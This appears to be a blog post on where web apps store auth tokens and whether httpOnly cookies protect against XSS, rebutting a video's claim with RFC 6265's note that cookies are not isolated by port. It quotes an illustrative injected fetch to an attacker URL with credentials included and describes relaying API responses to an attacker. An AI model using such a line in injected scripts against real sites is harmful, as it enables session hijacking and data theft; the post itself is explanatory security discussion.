
Whether you put the auth token in localStorage or in a cookie, both are defenseless against XSS (if we are talking about the same domain ...)


Places to store the token

  • localStorage
  • cookie
  • cookie (httpOnly)
  • in memory (a JavaScript variable)

A common piece of advice is that a JWT token should not be put in localStorage.
The reason given is that JavaScript can read it trivially, so if the page has an XSS vulnerability an unintended script gets executed and the token ends up stolen.
As the countermeasure, an httpOnly cookie is recommended all over the place.

But an httpOnly cookie turns out not to help either (so the claim goes)

localStorage vs Cookies for Auth Token Storage - Why httpOnly Cookies are NOT better!
https://www.youtube.com/watch?v=mBd-SMPp3kI

If there is XSS, the attacker's script runs no matter what. You might think "but an httpOnly cookie cannot be read from script, so it's fine", yet the video's claim is that an attacker who stands up their own server and has the injected script call fetch(attackerUrl, { credentials: "include" }) gets everything, httpOnly cookies included, sent to the attacker's server.

But that only holds within the same domain

See the comments

https://tools.ietf.org/html/rfc6265#section-8.5

Cookies do not provide isolation by port. If a cookie is readable by
a service running on one port, the cookie is also readable by a
service running on another port of the same server. If a cookie is
writable by a service on one port, the cookie is also writable by a
service running on another port of the same server. For this reason,
servers SHOULD NOT both run mutually distrusting services on
different ports of the same host and use cookies to store security-
sensitive information.

In the video, both the application and the "attacker" server ran on the localhost domain, on ports 3000 and 8000, so with credentials: "include" every cookie looked as if it were leaking. That is exactly the case the RFC describes: a cookie set by localhost:3000 is also sent to localhost:8000, because the browser never consults the port when deciding which cookies to attach.

If instead the credentials: "include" request went from a.domain to b.domain, a.domain's cookies would not leak to b.domain: cookies are scoped per host (plus the Domain attribute), so the browser attaches only the cookies that belong to the destination host, and an attacker-controlled origin never receives them. What XSS still allows, httpOnly or not, is for the injected script to call a.domain's own API from the victim's page with credentials: "include", since the cookie is attached to every request to a.domain; httpOnly stops the token from being read, not from being used, and the script can relay the API's responses to the attacker.

The YouTube video is now unlisted and does not come up in search.
